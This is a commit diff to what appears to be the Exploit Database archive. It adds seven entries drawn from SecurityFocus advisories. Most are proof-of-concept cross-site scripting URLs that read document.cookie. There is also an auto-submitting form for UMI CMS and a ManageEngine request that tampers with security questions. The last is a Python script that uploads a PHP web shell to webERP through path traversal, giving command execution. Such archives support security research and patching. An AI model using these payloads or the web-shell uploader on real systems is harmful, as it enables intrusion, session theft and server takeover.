Updated 11_24_2014

2014-11-24 04:47:19 +00:00 · 2014-11-24 04:47:19 +00:00 · 430fa48249
commit 430fa48249
parent 4283820381
8 changed files with 196 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -18183,7 +18183,7 @@ id,file,description,date,author,platform,type,port
 20912,platforms/windows/remote/20912.txt,"Trend Micro InterScan VirusWall for Windows NT 3.51 Configurations Modification Vulnerability",2001-06-12,"SNS Advisory",windows,remote,0
 20913,platforms/php/webapps/20913.txt,"Disqus Blog Comments Blind SQL Injection Vulnerability",2012-08-29,Spy_w4r3,php,webapps,0
 20914,platforms/cgi/remote/20914.pl,"cgiCentral WebStore 400 Administrator Authentication Bypass Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0
-20915,platforms/windows/local/20915.py,"ActFax 4.31 Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0
+20915,platforms/windows/local/20915.py,"ActFax 4.31 - Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0
 20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 Arbitrary Command Execution Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0
 20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability",2012-08-29,Ciph3r,windows,dos,0
 20918,platforms/php/webapps/20918.txt,"Wordpress HD Webplayer 1.1 - SQL Injection Vulnerability",2012-08-29,JoinSe7en,php,webapps,0
@ -31817,3 +31817,10 @@ id,file,description,date,author,platform,type,port
 35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
 35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0
 35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0
+35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0
+35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
+35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 'nav.html' Cross Site Scripting Vulnerability",2011-02-09,MustLive,php,webapps,0
+35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 POST Request Manipulation Security Question Weakness",2011-02-10,"Core Security",php,webapps,0
+35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 EmployeeSearch.cc Multiple Parameter XSS",2011-02-10,"Core Security",php,webapps,0
+35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 Multiple Cross Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0
+35333,platforms/php/webapps/35333.py,"webERP 4.0.1 'InputSerialItemsFile.php' Arbitrary File Upload Vulnerability",2011-02-10,"AutoSec Tools",php,webapps,0
--- a/platforms/php/webapps/35327.txt
+++ b/platforms/php/webapps/35327.txt
@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/46275/info
+
+CiviCRM is prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+CiviCRM 3.3.3. is vulnerable; prior versions may also be affected. 
+
+Drupal:
+
+http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?defaultPath=%3Cscript%3Ealert(0)%3C/script%3E
+
+http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/code.php?class=%3Cscript%3Ealert(0)%3C/script%3E
+
+http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/details.php?class=<script>alert(0)</script>
+
+http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/methodTable.php?class=%3Cscript%3Ealert(0)%3C/script%3E
+
+
+Joomla:
+
+http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?defaultPath=%3Cscript%3Ealert(0)%3C/script%3E
+
+http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/amfphp/browser/methodTable.php?class=%3Cscript%3Ealert(0)%3C/script%3E
+
+http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/PHPgettext/examples/pigs_dropin.php?lang=0%3Cscript%3Ealert(0)%3C/script%3E
+
+http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/PHPgettext/examples/pigs_fallback.php?lang=%3Cscript%3Ealert(0)%3C/script%3E
--- a/platforms/php/webapps/35328.txt
+++ b/platforms/php/webapps/35328.txt
@ -0,0 +1,47 @@
+source: http://www.securityfocus.com/bid/46280/info
+
+UMI CMS is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+UMI CMS 2.8.1.2 is vulnerable; other versions may also be affected.
+
+<form action="http://host/admin/news/edit/PAGEID/do/" method="post" name="main" enctype="multipart/form-data" >
+<input type="hidden" name="referer" value="hello">
+<input type="hidden" name="domain" value="host">
+<input type="hidden" name="name" value=&#039;news"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="alt-name" value="altname">
+<input type="hidden" name="active" value="0">
+<input type="hidden" name="active" value="1">
+<input type="hidden" name="type-id" value="23">
+<input type="hidden" name="save-mode" value="Save">
+<input type="hidden" name="template-id" value="2">
+<input type="hidden" name="is-visible" value="0">
+<input type="hidden" name="is-default" value="0">
+<input type="hidden" name="perms_read[2373]" value="1">
+</form>
+<script>
+document.main.submit();
+</script>
+
+
+
+<form action="http://[host]/admin/content/edit/PAGEID/do/" method="post" name="main" enctype="multipart/form-data" >
+
+<input type="hidden" name="referer" value="google">
+<input type="hidden" name="domain" value="[host]">
+<input type="hidden" name="name" value=&#039;price3"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="alt-name" value="price">
+<input type="hidden" name="active" value="0">
+<input type="hidden" name="active" value="1">
+<input type="hidden" name="type-id" value="10">
+<input type="hidden" name="save-mode" value="Save">
+<input type="hidden" name="template-id" value="2">
+<input type="hidden" name="is-visible" value="0">
+<input type="hidden" name="is-visible" value="1">
+<input type="hidden" name="is-default" value="0">
+
+</form>
+<script>
+document.main.submit();
+</script>
--- a/platforms/php/webapps/35329.txt
+++ b/platforms/php/webapps/35329.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46302/info
+
+PHPXref is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials.
+
+Versions prior to PHPXref 0.7 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/nav.html?javascript:alert(document.cookie) 
--- a/platforms/php/webapps/35330.txt
+++ b/platforms/php/webapps/35330.txt
@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/46331/info
+
+ManageEngine ADSelfService Plus is prone to multiple vulnerabilities, including multiple security-bypass and cross-site scripting vulnerabilities.
+
+Attackers can exploit these issues to bypass certain security restrictions and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help them steal cookie-based authentication credentials and launch other attacks.
+
+ManageEngine ADSelfService Plus 4.4 is vulnerable; other versions may also be affected. 
+
+POST /accounts/ValidateAnswers?methodToCall=validateAll HTTP/1.1
+
+Host: SERVER
+User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip,deflate
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+Keep-Alive: 115
+Proxy-Connection: keep-alive
+Referer: http://www.example.com/accounts/ValidateUser
+Cookie: JSESSIONID=8F93EB242EF06C51BE93EB0CEDA69085
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 294
+
+loginId=1501&Hide_Captcha=0&POLICY_ID=1&Confirm_Answer=1&SESSION_EXPIRY_TIME=5&LOGIN_NAME=alice&REM_SESSION_TIME=00%3A40&bAns=11111&bQues=PreDefined-2&bAns=22222&bQues=PreDefined-3&bAns=33333&bQues=PreDefined-4&bAns=44444&bQues=PreDefined-5&quesList=4&DIGEST=qodpgd&next=Continue&DIS_ALL_QUES=1
--- a/platforms/php/webapps/35331.txt
+++ b/platforms/php/webapps/35331.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46331/info
+ 
+ManageEngine ADSelfService Plus is prone to multiple vulnerabilities, including multiple security-bypass and cross-site scripting vulnerabilities.
+ 
+Attackers can exploit these issues to bypass certain security restrictions and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help them steal cookie-based authentication credentials and launch other attacks.
+ 
+ManageEngine ADSelfService Plus 4.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/EmployeeSearch.cc?actionId=showList&searchString=alice%22%20onmouseover=%22alert%28%27xss%27%29&parameterName=name&searchType=containshttp://www.example.com/EmployeeSearch.cc?actionId=Search&parameterName=name&searchType=contains&searchString=alice%22+onMouseOver%3D%22javascript%3Aalert%28%27xss%27%29
--- a/platforms/php/webapps/35332.txt
+++ b/platforms/php/webapps/35332.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/46337/info
+
+Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Dolphin 7.0.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/dolphin/explanation.php?explain=%3Cscript%3Ealert(0)%3C/script%3E 
+http://www.example.com/dolphin/modules/boonex/custom_rss/post_mod_crss.php?relocate=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
--- a/platforms/php/webapps/35333.py
+++ b/platforms/php/webapps/35333.py
@ -0,0 +1,61 @@
+source: http://www.securityfocus.com/bid/46341/info
+
+webERP is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+webERP 4.0.1 is vulnerable; other versions may also be affected. 
+
+import socket
+
+host = 'localhost'
+path = '/weberp'
+shell_path = path + '/shell.php'
+port = 80
+
+def upload_shell():
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    s.settimeout(8)    
+
+    s.send('POST ' + path + '/includes/InputSerialItemsFile.php?LineNo=/../../../shell.php%00 HTTP/1.1\r\n'
+           'Host: localhost\r\n'
+           'Connection: keep-alive\r\n'
+           'User-Agent: x\r\n'
+           'Content-Length: 264\r\n'
+           'Cache-Control: max-age=0\r\n'
+           'Origin: null\r\n'
+           'Content-Type: multipart/form-data; boundary=----x\r\n'
+           'Accept: text/html\r\n'
+           'Accept-Encoding: gzip,deflate,sdch\r\n'
+           'Accept-Language: en-US,en;q=0.8\r\n'
+           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="LineNo"\r\n'
+           '\r\n'
+           'shell.php\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="ImportFile"; filename="shell.php"\r\n'
+           'Content-Type: application/octet-stream\r\n'
+           '\r\n'
+           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
+           '------x--\r\n'
+           '\r\n')
+
+    resp = s.recv(8192)
+
+    http_ok = 'HTTP/1.1 200 OK'
+    
+    if http_ok not in resp[:len(http_ok)]:
+        print 'error uploading shell'
+        return
+    else: print 'shell uploaded'
+
+    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
+           'Host: ' + host + '\r\n\r\n')
+
+    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
+    else: print 'shell located at http://' + host + shell_path
+
+upload_shell()